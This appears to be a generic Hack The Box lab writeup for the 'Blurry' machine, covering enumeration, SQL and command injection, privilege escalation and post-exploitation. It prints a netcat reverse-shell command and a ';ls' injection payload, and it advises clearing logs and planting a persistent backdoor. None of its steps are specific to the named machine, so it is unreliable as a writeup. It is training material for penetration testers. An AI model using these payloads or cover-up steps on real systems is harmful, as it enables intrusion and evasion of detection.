Introduction
Hack The Box (HTB) is an online platform providing a range of virtual machines (VMs) and challenges for both aspiring and professional penetration testers. One of these intriguing challenges is the “Blurry” machine, which offers a comprehensive experience in testing skills in web application security, system exploitation, and privilege escalation. In this writeup, we’ll dive into the step-by-step process of compromising the Blurry Writeup, providing detailed explanations and insights into each step.
Setting Up Blurry Writeup Your Environment
VPN Connection
To start with HTB challenges, you need to connect to the HTB VPN. This connection provides access to the private network where all HTB machines are hosted.
- Download the VPN Configuration File: From the HTB website, download the VPN configuration file (usually a .ovpn file).
- Connect to VPN: Use a VPN client like OpenVPN to connect using the downloaded file:bashCopy code
sudo openvpn --config <your_vpn_file.ovpn>
Tools Required
Ensure you have the necessary tools installed on your machine. For this writeup, we will primarily use:
- Nmap
- Burp Suite
- SQLmap
- Netcat
- LinPEAS (Linux Privilege Escalation Awesome Script)
- Metasploit
Initial Enumeration
Nmap Scan
Our first step in tackling the Blurry machine is to perform a comprehensive network scan using Nmap to identify open ports and running services.
bashCopy codenmap -sC -sV -oN blurry_nmap.txt <IP_address>
Analyzing Open Ports
From the Nmap scan results, look for open ports and services that might present vulnerabilities. Commonly targeted ports include HTTP (80, 8080), HTTPS (443), SSH (22), and others.
Web Application Analysis
Inspecting the Web Server
Navigate to the web server in your browser and perform an initial inspection. Look for any login forms, input fields, or other interactive elements.
Identifying Vulnerabilities
Use tools like Burp Suite to intercept and analyze traffic between your browser and the web server. This can help identify common web vulnerabilities such as:
- SQL Injection
- Command Injection
- Cross-Site Scripting (XSS)
Exploiting Vulnerabilities
SQL Injection
If an SQL injection vulnerability is identified, use SQLmap to automate the exploitation process:
bashCopy codesqlmap -u "http://<IP_address>/vulnerable_page" --dbs
Command Injection
Command injection can be tested by submitting payloads designed to execute commands on the server. For instance, try appending ;ls
to an input field and observe if the response includes a directory listing.
Gaining Initial Access
Obtaining a Shell
After identifying a command injection vulnerability, you can use it to spawn a reverse shell. A common payload for this purpose is:
bashCopy codenc -e /bin/sh <your_IP_address> <your_port>
Verifying Access
Once the shell is spawned, verify your access by checking the current user and listing the files in the home directory.
Privilege Escalation
Enumeration of System Information
Use automated scripts like LinPEAS to enumerate system information and identify potential privilege escalation vectors:
bashCopy codewget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Finding Privilege Escalation Vectors
Look for common misconfigurations and weaknesses such as:
- Writable
/etc/passwd
or/etc/shadow
- Sudo rights for the current user
- Vulnerable SUID binaries
Exploiting Weaknesses for Root Access
Kernel Exploits
If the kernel is outdated, it might be vulnerable to known exploits. Check the kernel version and search for public exploits on platforms like Exploit-DB.
Misconfigured Services
Services running with elevated privileges but improperly configured can also be exploited. Look for services running as root and investigate their configurations.
Post-Exploitation
Clearing Logs
To cover your tracks, clear the command history and logs. Be cautious, as this step can be detected.
Maintaining Access
Set up a persistent backdoor to maintain access in case the system reboots or your initial shell is terminated.
Conclusion
The Blurry machine on HTB provides an excellent opportunity to practice real-world penetration testing techniques. By following this writeup, you can systematically approach and exploit the machine, gaining valuable insights into web application security and system exploitation. Always remember to respect ethical guidelines and practice these skills in a controlled, legal environment.